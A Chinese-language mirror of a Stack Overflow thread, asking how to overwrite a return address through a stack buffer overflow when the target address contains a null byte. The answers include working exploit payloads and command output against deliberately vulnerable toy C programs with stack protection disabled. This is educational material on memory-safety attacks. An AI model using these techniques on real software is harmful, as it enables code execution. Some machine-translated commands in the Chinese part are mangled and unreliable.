缓冲区溢出返回地址为00

发布于 2024-10-27 03:50:29 字数 539 浏览 4 评论 0原文

我只是想让缓冲区溢出在 OSX(10.6) 上的以下程序上工作;我需要通过溢出缓冲区来执行 foo 。

#include <string.h>
#include <stdio.h>
void foo() {
    printf("hacked!");
}
int main(int argc, const char *argv[]) {
    char s[100];
    strcpy(s, argv[1]);
}

我将其编译为:-

$ gcc -o test test.c -arch i386

在反汇编 test 时,我得到 foo 的地址为 0x00001eda。该漏洞无法按预期发挥作用;可能是因为返回地址应该被包含 \x000x00001eda 溢出。

如果目标地址有\x00,如何执行缓冲区溢出漏洞利用?

I was just trying to get a buffer overflow to work on OSX(10.6) on the following program; I need to make foo execute by overflowing the buffer.

#include <string.h>
#include <stdio.h>
void foo() {
    printf("hacked!");
}
int main(int argc, const char *argv[]) {
    char s[100];
    strcpy(s, argv[1]);
}

I compile it as:-

$ gcc -o test test.c -arch i386

On disassembling test I get the address of foo as 0x00001eda. The exploit does not work as intended; probably because the return address is supposed to be overflowed with 0x00001eda with contains a \x00.

In cases where the target address has a \x00, how can a buffer overflow exploit be performed?

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(3

愿与i 2024-11-03 03:50:29

strcpy() 函数在遇到零字节 (\x00) 时停止。由于您要写入堆栈的地址可能包含这样一个字节,因此执行与以下示例之一类似的操作也许是可以接受的。

免责声明

由于我无法访问 OS X 10.6 环境,因此使用 GCC 4.5.2(MinGW 32 位)在 Windows 7 64 位上开发和测试了以下代码。我依靠 gdb 来帮助确定 foo() 的地址和堆栈帧中返回地址的位置。提供了有关如何使用 gdb 确定从缓冲区到返回地址的偏移量的进一步说明 此处


示例 1

代码

int main()
{
    char s[4];
    gets(s);
}

减小了缓冲区的大小,以便使用较短的输入文本来溢出缓冲区。

输出

gcc -g -fno-stack-protector -o test test.c
打印 1234567890abcdef\xc6\x13\x30 | ./测试
被黑了!


示例 2

代码

int main(int argc, const char *argv[])
{
    char s[100];
    sscanf(argv[2], "%x", &s[atoi(argv[1])]);
}

使用 atoi() 直接定位返回地址并不是真正的“缓冲区溢出”的好例子。不过,对于在堆栈帧内定位和修改返回地址来说,这是一个很好的练习。

输出

gcc -g -fno-stack-protector -o test test.c
./测试112 4013c6
被黑了!

The strcpy() function stops when it encounters a zero byte (\x00). Since the address you want to write to the stack may contain such a byte, perhaps it is acceptable to do something similar to one of the following examples.

disclaimer

Due to my lack of access to a OS X 10.6 environment, the following code was developed and tested on Windows 7 64-bit using GCC 4.5.2 (MinGW 32-bit). I relied on gdb to assist in determining both the address of foo() and the location of the return address in the stack frame. Further explanation of how I use gdb to determine offset from the buffer to the return address is provided here.


Example 1

code

int main()
{
    char s[4];
    gets(s);
}

The size of the buffer was reduced in order to use shorter input text for overflowing the buffer.

output

gcc -g -fno-stack-protector -o test test.c
printf 1234567890abcdef\xc6\x13\x30 | ./test
hacked!


Example 2

code

int main(int argc, const char *argv[])
{
    char s[100];
    sscanf(argv[2], "%x", &s[atoi(argv[1])]);
}

The use of atoi() to directly target the return address is not really a good example of a "buffer overflow". However, it is a good exercise in locating and modifying the return address within the stack frame.

output

gcc -g -fno-stack-protector -o test test.c
./test 112 4013c6
hacked!

叫嚣ゝ 2024-11-03 03:50:29

请记住,所有整数(我很确定这包括返回地址)都以小端格式存储,这意味着最低有效字节首先出现。

因此,您所需的返回地址 (0x00001eda) 的字节将是:

0xda, 0x1e, 0x00, 0x00

查看 karlphillip 将您链接到的代码。他只在字符串末尾插入了两个地址字节。你也可以这样做。 strcpy 函数将愉快地将字符串末尾的两个字节复制到堆栈中,并愉快地添加空终止字符 (\x00)。因此strcpy可以设置假返回地址的前3个字节。如果幸运的话,也许第 4 个字节已经是 \x00,因为正确的返回地址的第 4 个字节是 \x00?

这不是我的专业知识,所以我可能是错的。

Remember that all integers (and I'm pretty sure this includes return addresses) are stored in little endian format, which means that the least-significant bytes come first.

Therefore, the bytes of your desired return address (0x00001eda) would be:

0xda, 0x1e, 0x00, 0x00

Look at the code that karlphillip linked you to. He only inserted two address bytes in to the end of his string. You could do the same. The strcpy function will happily copy the two bytes at the end of your string on to the stack, and happily add the null termination character (\x00). Therefore strcpy can set the first 3 bytes of the fake return address. If you are lucky, maybe the 4th byte will already be \x00, because the 4th byte of the correct return address was \x00?

This is not my expertise so I might be wrong.

夜光 2024-11-03 03:50:29

由于某种原因,即使应用程序崩溃了,我也无法使用 strcpy 覆盖堆栈和寄存器。

这个问题与你的问题相关,我设法使用该代码

For some reason I was unable to override the stack and registers using strcpy, even though the application crashed.

This question is related to yours and I managed to do trick using that code.

~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文